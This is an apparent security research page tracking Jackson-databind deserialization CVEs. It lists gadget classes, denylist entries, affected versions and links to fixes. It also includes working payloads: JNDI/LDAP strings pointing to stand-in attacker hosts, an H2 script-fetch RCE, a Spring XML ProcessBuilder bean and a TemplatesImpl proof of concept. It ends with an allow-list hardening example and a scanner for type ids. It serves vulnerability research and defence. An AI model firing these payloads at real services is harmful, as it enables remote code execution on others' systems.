Jackson

Black-box detection

Add a key-value pair
{"

 

gadget

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
sun.reflect.annotation.AnnotationInvocationHandler
java.util.LinkedHashSet

org.springframework.context.support.FileSystemXmlApplicationContext

 

Reference articles on how the gadgets work

https://b1ngz.github.io/java-deserialization-jdk7u21-gadget-note/   Jdk7u21
https://www.cnblogs.com/hucn/p/3636912.html javassist
https://docs.oracle.com/javase/specs/jls/se7/html/jls-8.html#jls-8.7 Java static initializer
https://stackoverflow.com/a/8100407/6467552 Class.forName("SomeClass") and ClassLoader.loadClass("SomeClass")
https://www.jianshu.com/p/c959666cd8dd Using the H2 database
https://blog.csdn.net/shanshiping/article/details/51444229 H2 database remote connection configuration
https://github.com/FasterXML/jackson-docs/wiki/   Official wiki

 

Dependency JARs

jackson-databind.*jar
jackson-annotations.*jar
jackson-core.*jar
logback-core.*jar
h2-.*jar

 

Vulnerability tracking

CVE-2020-25649
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3 security update
Security Fix(es): * jackson-databind: FasterXML DOMDeserializer insecure entity expansion is vulnerable to XML external entity

CVE-2020-24750
Security Fix(es): * jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration

CVE-2020-24616
Another gadget type(s) reported regarding class(es) of br.com.anteros:Anteros-DBCP library.

CVE-2020-14195
Another gadget type(s) reported regarding class(es) of org.jsecurity:jsecurity. library.
Fix will likely be included in: 2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).

CVE-2020-14062
Another gadget type(s) reported regarding class(es) of com.sun.xml.parsers:jaxp-ri (in shaded copy of Xalan2).
Fix will be included in:2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).

CVE-2020-14061
Another gadget type(s) reported regarding class(es) of aqapi.jar library, included in Weblogic (for Oracle AQ/JMS support).
Fix will be included in:2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
jackson-databind: serialization in weblogic/oracle-aqjms
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).

CVE-2020-14060
Another gadget type(s) reported regarding class(es) of org.apache.drill.exec:drill-jdbc-all. library.
Fix is included in:2.9.10.5 Not considered valid CVE for Jackson 2.10.0 and later
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).

CVE-2020-11620
Another gadget type(s) reported regarding class(es) of commons-jelly:commons-jelly. library.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later

CVE-2020-11619
Another gadget type(s) reported regarding class(es) of org.springframework:spring-aop. library.
Fix will be included in:2.9.10.4 Does not affect 2.10.0 and later
jackson-databind: Serialization gadgets in org.springframework:spring-aop

CVE-2020-11113

Another gadget type(s) reported regarding class(es) of org.apache.openjpa:openjpa. library.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later

CVE-2020-11112
Another gadget type(s) reported regarding a class of org.apache.commons:commons-proxy library.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later

CVE-2020-11111
Another gadget type(s) reported regarding classes of org.apache.activemq:activemq-pool, org.apache.activemq:activemq-pool-jms libraries.
Fix will be included in: 2.9.10.4 Does not affect 2.10.0 and later

CVE-2020-10969

Another gadget type reported regarding a class in javax.swing package.
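javax.swing.JEditorPane in FasterXML jackson-databind 2.x before 2.9.10.4 has a code-issue vulnerability. A remote attacker can exploit it with specially crafted input to execute arbitrary code on the system.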
Serialization gadgets in javax.swing.JEditorPane

CVE-2020-10968
Another gadget type(s) reported regarding a class of aoju/bus-proxy library.
Fix will likely be included in: 2.9.10.4 Does not affect 2.10.0 and later
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider

CVE-2020-10673
Another gadget type(s) reported regarding a class of caucho-quercus library
Fix will likely be included in: 2.9.10.4 Does not affect 2.10.0 and later

CVE-2020-10672
Another gadget type(s) reported regarding class(es) of org.apache.aries.transaction.jms.
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
Fix will likely be included in: 2.9.10.4 Does not affect 2.10.0 and later

CVE-2020-10650
Another gadget type reported regarding a class of ignite-jta.

CVE-2020-9547 / CVE-2020-9548
Another 2 gadget types reported regarding classes of ibatis-sqlmap and Anteros-Core packages.

CVE-2020-9546
Another gadget type reported regarding a class of [TO BE ADDED].
Fix will be included in: 2.9.10.4 2.8.11.6 (jackson-bom version 2.8.11.20200310) 2.7.9.7 Does not affect 2.10.0 and later

DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system,
caused by the mishandling of interaction between serialization gadgets and typing in
org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).
By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.
jackson-databind: Serialization gadgets in shaded-hikari-config

CVE-2020-8840
Another gadget (*) type reported related to JNDI access.
Fixed in: 2.9.10.3 (jackson-bom version 2.9.10.20200223) 2.8.11.5 (jackson-bom version 2.8.11.20200210) 2.7.9.7 does not affect 2.10.0 and later

jackson-databind: Lacks certain xbean-reflect/JNDI blocking

CVE-2019-20330
Another 2 gadget (*) types reported related to JNDI access
Fixed in: 2.9.10.2 (jackson-bom version 2.9.10.20200223) 2.8.11.5 (jackson-bom version 2.8.11.20200210) 2.7.9.7 does not affect 2.10.0 and later
In jackson-databind 2.9.10, you have banned two gadget types ("net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup" and "net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup").

CVE-2019-17531
Another gadget type reported regarding a class of apache-log4j-extras package.
Fix will be included in: 2.9.10.1 2.8.11.5 2.6.7.3 does not affect 2.10.0 and later
#2498: Block one more gadget type (log4j-extras/1.2)
// [databind#2498]: log4j-extras (1.2)
s.add("org.apache.log4j.receivers.db.DriverManagerConnectionSource");
s.add("org.apache.log4j.receivers.db.JNDIConnectionSource");


CVE-2019-17267
Another gadget (*) type report regarding a class of ehcache package  
Fix included in: 2.9.10 2.8.11.5 does not affect 2.10.0 and later
#2460: Block one more gadget type (ehcache, no CVE allocated yet)
s.add("net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup");

CVE-2019-16942 / CVE-2019-16943
Another 2 gadget (*) types reported regarding classes of commons-dbcp and p6spy packages
Fixed in: 2.9.10.1 (use jackson-bom version 2.9.10.20191020) 2.6.7.3 2.8.11.5 does not affect 2.10.0 and later

CVE-2019-16335

Block added in 2.9 to be included in 2.9.10. Also backported in 2.8 branch but uncertain if new micro-patch will be released (but if it is, that'd be 2.8.11.5)

CVE-2019-14893
Another gadget (*) type report regarding a class of xalan.
2.9.10 2.8.11.5 does not affect 2.10.0 and later
Block one more gadget type (xalan2)

CVE-2019-14892
Another gadget (*) type report regarding a class of commons-configuration (and later commons-configuration2) package(s)
Fixed in: 2.9.10 and later 2.8.11.5 2.6.7.3 does not affect 2.10.0 and later
FasterXML jackson-databind 2.6.7 and later (fixed in 2.6.7.3), 2.8.0 and later (fixed in 2.8.11.5) and 2.9.0 and later (fixed in 2.9.10) have a code-issue vulnerability. An attacker can exploit it to execute arbitrary code.


CVE-2019-14661 / CVE-2019-14060 / CVE-2019-14662
CVE-2019-14060
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill). By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVE-2019-14661
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms). By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.
CVE-2019-14662
DESCRIPTION: FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2). By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.

CVE-2019-14540
Another gadget (*) type report regarding HikariConfig, via HikariDataSource
Fixed in: 2.9.10 2.8.11.5 2.6.7.3 does not affect 2.10.0 and later
// [databind#2449]: and sub-class thereof
s.add("com.zaxxer.hikari.HikariDataSource");

CVE-2019-14439
Bypass for the CVE-2019-12384 vulnerability
Another gadget type report regarding logback/JNDI.
Fixed in: 2.9.10 2.8.11.4 2.7.9.6 2.6.7.3

CVE-2019-14379
Another gadget type reported regarding a class of ehcache package.
Fixed in: 2.9.10 2.8.11.4 2.7.9.6 2.6.7.3

CVE-2019-14361
Bypass for the CVE-2019-12384 vulnerability

CVE-2019-12814
Similar to other polymorphic types with no limits, but for XXE with jdom2.jar
Fixed in: 2.9.10 2.8.11.4 2.7.9.6 2.6.7.3
// [databind#2341]: jdom/jdom2
s.add("org.jdom.transform.XSLTransformer");
s.add("org.jdom2.transform.XSLTransformer");

CVE-2019-12384
// [databind#2334] (2.9.9.1): logback-core
s.add("ch.qos.logback.core.db.DriverManagerConnectionSource");

CVE-2019-12086
// [databind#2326] (2.7.9.6): one more 3rd party gadget
s.add("com.mysql.cj.jdbc.admin.MiniAdmin");

CVE-2018-1000873

Performance issue with malicious `BigDecimal` input, `InstantDeserializer`, `DurationDeserializer`

CVE-2018-19360 / CVE-2018-19361 / CVE-2018-19362
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization.
Fixed in: 2.9.8 and later 2.8.11.3 2.7.9.5 2.6.7.3
// [databind#2186]: yet more 3rd party gadgets
s.add("org.jboss.util.propertyeditor.DocumentEditor");
s.add("org.apache.openjpa.ee.RegistryManagedRuntime");
s.add("org.apache.openjpa.ee.JNDIManagedRuntime");
s.add("org.apache.axis2.transport.jms.JMSOutTransportInfo");

CVE-2018-14721 / CVE-2018-14720 / CVE-2018-14719 / CVE-2018-14718
This issue covers following CVEs related to polymorphic deserialization, gadgets:
CVE-2018-14718: RCE with slf4j-ext jar
CVE-2018-14719: RCE with blaze-ds-opt, -core jars
CVE-2018-14720: exfiltration/XXE with only JDK classes (some JDK versions)
CVE-2018-14721: exfiltration/SSRF with axis2-jaxws
Fixed in: 2.9.7 and later 2.8.11.3 2.7.9.5 2.6.7.3
#2097: Block more classes from polymorphic deserialization (CVE-2018-14718 - CVE-2018-14721)
// [databind#2097]: some 3rd party, one JDK-bundled
s.add("org.slf4j.ext.EventData");
s.add("flex.messaging.util.concurrent.AsynchBeansWorkManagerExecutor");
s.add("com.sun.deploy.security.ruleset.DRSHelper");
s.add("org.apache.axis2.jaxws.spi.handler.HandlerResolverImpl");

CVE-2018-12023
There is a potential remote code execution (RCE) vulnerability, if user is
1. handling untrusted content (where attacker can craft JSON)
2. using "Default Typing" feature (or equivalent; polymorphic value with base type of java.lang.Object)
3. has oracle JDBC driver jar in classpath
4. allows connections from service to untrusted hosts (where attacker can run an LDAP service)
Fixed in: 2.9.6 and later 2.8.11.2 2.7.9.4 2.6.7.3
// [databind#2058]: Oracle JDBC driver, with jndi/ldap lookup
s.add("oracle.jdbc.connector.OracleManagedConnectionFactory");
s.add("oracle.jdbc.rowset.OracleJDBCRowSet");

CVE-2018-12022
There is a potential remote code execution (RCE) vulnerability, if user is
1. handling untrusted content (where attacker can craft JSON)
2. using "Default Typing" feature (or equivalent; polymorphic value with base type of java.lang.Object)
3. has jodd-db (https://jodd.org/db/) jar in classpath
4. allows connections from service to untrusted hosts (where attacker can run an LDAP service)
Fixed in: 2.9.6 and later 2.8.11.2 2.7.9.4 2.6.7.3

// [databind#2052]: ldap approaches; in all cases LDAP connection String is passed
// and access attempt is made:
s.add("oracle.jdbc.connector.OracleManagedConnectionFactory");
s.add("jodd.db.connection.DataSourceConnectionProvider");
s.add("oracle.jdbc.rowset.OracleJDBCRowSet");

CVE-2018-11307
A new potential gadget type from MyBatis (https://github.com/mybatis/mybatis-3) has been reported.
It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled.
Fixed in 2.9.5 and later 2.8.11.2 2.7.9.4 2.6.7.3
// [databind#2032]: more 3rd party; data exfiltration via xml parsed ext entities
s.add("org.apache.ibatis.parsing.XPathParser");

CVE-2018-7489
Block two more gadgets to exploit default typing issue

CVE-2018-5968
#1872 `NullPointerException` in `SubTypeValidator.validateSubType` when
#1899: Another two gadgets to exploit default typing issue in jackson-databind (reported by OneSourceCat@github)
// [databind#1899]: more 3rd party
s.add("org.hibernate.jmx.StatisticsService");
s.add("org.apache.ibatis.datasource.jndi.JndiDataSourceFactory");

CVE-2017-17485
More potential deserialization gadgets reported for:
DBCP types (similar to c3p0 ones already included)
Spring framework AOP helpers
Spring framework application context
For some of these need to check parent hierarchy.
Fixed in: 2.9.4 2.8.11 2.7.9.2 2.6.7.3 Not applicable to 2.10.0 or later


CVE-2017-15095
Block more JDK types from polymorphic deserialization (CVE 2017-15095) #1737

CVE-2017-7525
Jackson Deserializer security vulnerability via default typing (CVE-2017-7525) #1599
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9

 

Links from affected vendors

https://www.ibm.com/support/pages/node/6348046
https://www.ibm.com/support/pages/node/6343203
https://www.ibm.com/support/pages/node/6324677

https://access.redhat.com/errata/RHSA-2020:4173
https://packetstormsecurity.com/files/159724/Red-Hat-Security-Advisory-2020-4366-01.html

https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-July-2020-32829

https://www.oracle.com/security-alerts/cpujul2020.html

https://security-tracker.debian.org/tracker/source-package/jackson-databind
https://www.debian.org/security/2019/dsa-4542
https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html

https://github.com/folio-org/raml-module-builder/pull/549

https://github.com/SeldonIO/seldon-core/issues/981

https://github.com/akka/akka-http/pull/2688

https://github.com/dakrone/cheshire/issues/155

https://github.com/swagger-api/swagger-codegen/pull/9584

 

CVE-2020-24750

Affected versions

FasterXML jackson-databind 2.0 series, versions before 2.9.10.6

 

CVE-2020-24616

Affected versions

FasterXML jackson-databind 2.x series, versions before 2.9.10.6

Exploited classes

br.com.anteros:Anteros-DBCP  
org.arrahtec:profiler-core  
com.nqadmin.rowset:jdbcrowsetimpl  
com.pastdev.httpcomponents:configuration
org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl

 

CVE-2020-14060

Affected versions

jackson-databind before 2.9.10.4 
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

Exploitation conditions

1. enableDefaultTyping() is enabled
2. The third-party dependency org.apache.drill.exec:drill-jdbc-all is used

 

CVE-2020-11113

Affected versions

Jackson-databind 2.x before 2.9.10.4

 

CVE-2020-10673

Affected versions

Version <= FasterXML jackson-databind 2.9.10.3

Payload

com.caucho.config.types.ResourceRef.

 

CVE-2020-9548

Affected versions

jackson-databind < 2.10.0

Payload

\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap|RMI://[IP]:[Port]/[Exploit]\"}

 

CVE-2020-9547

Payload

\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\", {\"properties\": {\"UserTransaction\":\"ldap|RMI://[IP]:[Port]/[Exploit]\"}}

poc

["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig", {"properties": {"UserTransaction":"ldap://[IP]:[Port]/[EvilObject]"}}]

 

CVE-2020-8840

Affected versions

2.0.0 <= Jackson-databind <= 2.9.10.2 (Jackson-databind 2.8.11.5 is not affected)

Exploitation conditions

The autoType feature is enabled

Exploited class

org.apache.xbean.propertyeditor.JndiConverter

poc 

["org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://IP:[Port]/[EvilObject]"}]


CVE-2020-10969

Affected versions

jackson-databind before 2.9.10.3 
jackson-databind before 2.10.2

Exploitation conditions

enableDefaultTyping() is enabled

Payload

\"javax.swing.JEditorPane\",{\"page\":\"http://xxx.dnslog.cn\"}

 poc

["javax.swing.JEditorPane",{"page":"http://xxx.dnslog.cn"}]

 

CVE-2019-14439

Affected versions

Jackson-databind < 2.9.9.2 
Jackson-databind < 2.10.0
Jackson-databind < 2.7.9.6
Jackson-databind < 2.8.11.4

 

CVE-2019-14361

Affected versions

Jackson-databind < 2.9.9.2 
Jackson-databind < 2.10.0 
Jackson-databind < 2.7.9.6
Jackson-databind < 2.8.11.4 
Jackson-databind < 2.6.7.3

 

CVE-2019-12384

Payload

//SSRF
\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://127.0.0.1:8005/~/test\"}

//RCE
\"ch.qos.logback.core.db.DriverManagerConnectionSource\"{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost/inject.sql'\"}

 

CVE-2019-12814    | Jackson JDOM (combined exploitation of deserialization and XXE)

Affected versions

Jackson 2.x ~2.9.9

Exploitation conditions

1. enableDefaultTyping is enabled
2. A JDOM 1.x or JDOM 2.x dependency is used

 

CVE-2019-12086

Affected versions

Jackson-databind 2.x before 2.9.9

Exploitation conditions

1. Default Typing is enabled,
2. mysql-connector-java below version 8.0.15 (released 2019.2.1) is present on the classpath

Payload

"com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_Host:Port/foo"

 

CVE-2017-17485

Payload

//touch
{
  "param": [
    "org.springframework.context.support.FileSystemXmlApplicationContext",
    "[Host]/spel.xml"
  ]
}


//spel.xml
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>touch</value>
                <value>/tmp/prove2.txt</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>

 

CVE-2017-7525

POC

//touch
{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
        "Base64_POC"
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

 

package net.xxx;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Main {
    public static void main(String[] args) {
        String json = "[\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", {\"transletBytecodes\": [\"Base64_POC\"], \"transletName\": \"a.b\", \"outputProperties\": {} }]";
        try {
            ObjectMapper objectMapper = new ObjectMapper();
            objectMapper.enableDefaultTyping();
            Object o = objectMapper.readValue(json, Object.class);
            System.out.println(o);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
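The hardened counterpart of the `Main` class above, as an added example (not code from the original post or from the Jackson project): on jackson-databind 2.10 or later, `activateDefaultTyping` takes a `PolymorphicTypeValidator` allow-list, so a type id outside the list is refused instead of being instantiated. The class name `SafeTypingDemo` and the package prefix `com.example.dto.` are hypothetical.

```java
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

import java.util.LinkedHashMap;

public class SafeTypingDemo {

    // Allow-list: only these subtypes may be named by a type id in the input.
    // "com.example.dto." is a hypothetical package holding the application's DTOs.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.dto.")
                .allowIfSubType(LinkedHashMap.class)
                .build();
        ObjectMapper mapper = new ObjectMapper();
        // Same applicability that enableDefaultTyping() used, but gated by the validator.
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return mapper;
    }

    // Returns a short verdict instead of throwing, so callers can log it.
    static String tryRead(ObjectMapper mapper, String json) {
        try {
            Object o = mapper.readValue(json, Object.class);
            return "accepted: " + o.getClass().getName();
        } catch (JsonProcessingException e) {
            // A type id outside the allow-list ends up here.
            return "rejected: " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) {
        ObjectMapper mapper = hardenedMapper();

        // Constructed input naming an allow-listed type.
        String allowed = "[\"java.util.LinkedHashMap\", {\"name\": \"demo\"}]";

        // Same JSON string as the Main class above (placeholder bytecode, not a real payload).
        String denied = "[\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\","
                + " {\"transletBytecodes\": [\"Base64_POC\"], \"transletName\": \"a.b\","
                + " \"outputProperties\": {} }]";

        System.out.println(tryRead(mapper, allowed));
        System.out.println(tryRead(mapper, denied));
    }
}
```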

 

Related gadgets

org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.InstantiateTransformer
org.apache.commons.collections4.functors.InvokerTransformer
org.apache.commons.collections4.functors.InstantiateTransformer
org.codehaus.groovy.runtime.ConvertedClosure
org.codehaus.groovy.runtime.MethodClosure
org.springframework.beans.factory.ObjectFactory
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
org.apache.xalan.xsltc.trax.TemplatesImpl
com.sun.rowset.JdbcRowSetImpl
java.util.logging.FileHandler
java.rmi.server.UnicastRemoteObject
org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor
org.springframework.beans.factory.config.PropertyPathFactoryBean
com.mchange.v2.c3p0.JndiRefForwardingDataSource
com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
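A defensive use of the class names listed on this page, as an added example (not code from the original post or from the Jackson project): a pre-deserialization scan that walks a request body as a plain JSON tree and reports class-name type ids, both in the wrapper-array shape used by the payloads here and in the `@class` property shape. The class name `TypeIdScan`, the finding labels and the sample bodies are constructed for illustration.

```java
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Set;
import java.util.regex.Pattern;

public class TypeIdScan {

    // A few of the class names listed on this page; load the full list in practice.
    static final Set<String> KNOWN_GADGETS = new HashSet<>(Arrays.asList(
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
            "com.sun.rowset.JdbcRowSetImpl",
            "ch.qos.logback.core.db.DriverManagerConnectionSource",
            "org.springframework.context.support.FileSystemXmlApplicationContext"));

    // Dotted Java identifier such as "a.b.C". A list of known names is never
    // complete, so any class-name-shaped type id is reported as well.
    static final Pattern CLASS_NAME =
            Pattern.compile("[A-Za-z_$][\\w$]*(\\.[A-Za-z_$][\\w$]*)+");

    // readTree() only builds JsonNode values and never resolves type ids,
    // so it can be pointed at untrusted input.
    static final ObjectMapper TREE = new ObjectMapper();

    static List<String> scan(String json) throws IOException {
        List<String> findings = new ArrayList<>();
        walk(TREE.readTree(json), "$", findings);
        return findings;
    }

    private static void walk(JsonNode node, String path, List<String> out) {
        if (node.isArray()) {
            // Wrapper-array type id: ["class.name", value]
            if (node.size() == 2 && node.get(0).isTextual()) {
                report(node.get(0).asText(), path, out);
            }
            for (int i = 0; i < node.size(); i++) {
                walk(node.get(i), path + "[" + i + "]", out);
            }
        } else if (node.isObject()) {
            // Property-style type id: "@class" is Jackson's default property
            // name for JsonTypeInfo.Id.CLASS.
            JsonNode cls = node.get("@class");
            if (cls != null && cls.isTextual()) {
                report(cls.asText(), path, out);
            }
            for (Iterator<String> it = node.fieldNames(); it.hasNext(); ) {
                String name = it.next();
                walk(node.get(name), path + "." + name, out);
            }
        }
    }

    private static void report(String typeId, String path, List<String> out) {
        if (KNOWN_GADGETS.contains(typeId)) {
            out.add("KNOWN_GADGET " + path + " " + typeId);
        } else if (CLASS_NAME.matcher(typeId).matches()) {
            out.add("CLASS_NAME " + path + " " + typeId);
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample bodies; the second reuses the shape shown on this page.
        String benign = "{\"user\": \"alice\", \"tags\": [\"blue\", \"green\"]}";
        String suspicious = "{\"param\": [\"org.springframework.context.support."
                + "FileSystemXmlApplicationContext\", \"[Host]/spel.xml\"]}";
        System.out.println(scan(benign));
        System.out.println(scan(suspicious));
    }
}
```

A `CLASS_NAME` finding is a triage signal only: a two-element array that starts with a hostname or other dotted string matches the same pattern.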

 

Vulnerability fix tracking

Source code tracking
release-notes/VERSION
src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java
src/test/java/com/fasterxml/jackson/databind/interop/IllegalTypesCheckTest.java
src/main/java/com/fasterxml/jackson/databind/deser/BeanDeserializerFactory.java
src/test/java/com/mchange/v2/c3p0/jacksontest/ComboPooledDataSource.java


Issue tracking
https://github.com/FasterXML/jackson-databind/issues/2827
https://github.com/FasterXML/jackson-databind/issues/2826
https://github.com/FasterXML/jackson-databind/issues/2814
https://github.com/FasterXML/jackson-databind/issues/2798
https://github.com/FasterXML/jackson-databind/issues/2765
https://github.com/FasterXML/jackson-databind/issues/2704
https://github.com/FasterXML/jackson-databind/issues/2698
https://github.com/FasterXML/jackson-databind/issues/2688
https://github.com/FasterXML/jackson-databind/issues/2682
https://github.com/FasterXML/jackson-databind/issues/2680
https://github.com/FasterXML/jackson-databind/issues/2670
https://github.com/FasterXML/jackson-databind/issues/2666
https://github.com/FasterXML/jackson-databind/issues/2664
https://github.com/FasterXML/jackson-databind/issues/2662
https://github.com/FasterXML/jackson-databind/issues/2660
https://github.com/FasterXML/jackson-databind/issues/2659
https://github.com/FasterXML/jackson-databind/issues/2658
https://github.com/FasterXML/jackson-databind/issues/2642
https://github.com/FasterXML/jackson-databind/issues/2460
https://github.com/FasterXML/jackson-databind/issues/2634
https://github.com/FasterXML/jackson-databind/issues/2631
https://github.com/FasterXML/jackson-databind/issues/2620
https://github.com/FasterXML/jackson-databind/issues/2526
https://github.com/FasterXML/jackson-databind/issues/2521
https://github.com/FasterXML/jackson-databind/issues/2498
https://github.com/FasterXML/jackson-databind/issues/2478
https://github.com/FasterXML/jackson-databind/issues/2469
https://github.com/FasterXML/jackson-databind/issues/2462
https://github.com/FasterXML/jackson-databind/issues/2449
https://github.com/FasterXML/jackson-databind/issues/2410
https://github.com/FasterXML/jackson-databind/issues/2389
https://github.com/FasterXML/jackson-databind/issues/2387
https://github.com/FasterXML/jackson-databind/issues/2341
https://github.com/FasterXML/jackson-databind/issues/2186
https://github.com/FasterXML/jackson-databind/issues/2141
https://github.com/FasterXML/jackson-databind/issues/2097
https://github.com/FasterXML/jackson-databind/issues/2058
https://github.com/FasterXML/jackson-databind/issues/2052
https://github.com/FasterXML/jackson-databind/issues/2032
https://github.com/FasterXML/jackson-databind/issues/1931
https://github.com/FasterXML/jackson-databind/issues/1899
https://github.com/FasterXML/jackson-databind/issues/1872
https://github.com/FasterXML/jackson-databind/issues/1855
https://github.com/FasterXML/jackson-databind/issues/1737
https://github.com/FasterXML/jackson-databind/issues/1723
https://github.com/FasterXML/jackson-databind/issues/1680
https://github.com/FasterXML/jackson-databind/issues/1599

https://github.com/FasterXML/jackson-modules-java8/issues/90
https://github.com/FasterXML/jackson-modules-java8/pull/87
https://github.com/FasterXML/jackson-modules-java8/pull/85
https://github.com/FasterXML/jackson-modules-java8/pull/84

Fix tracking
https://github.com/FasterXML/jackson-databind/commit/a424c038ba0c0d65e579e22001dec925902ac0ef
https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317
https://github.com/atlassian/jackson-1/commit/086ce2167022084ca9b496fb86e350897b8b7830
https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb
https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0
https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5
https://github.com/marco-schmidt/am/commit/9a566b5a6b4870ccf4e50126b1e49d13c0ebf692
https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db
https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b
https://github.com/FasterXML/jackson-databind/commit/c9ef4a10d6f6633cf470d6a469514b68fa2be234
https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737
https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1
https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a
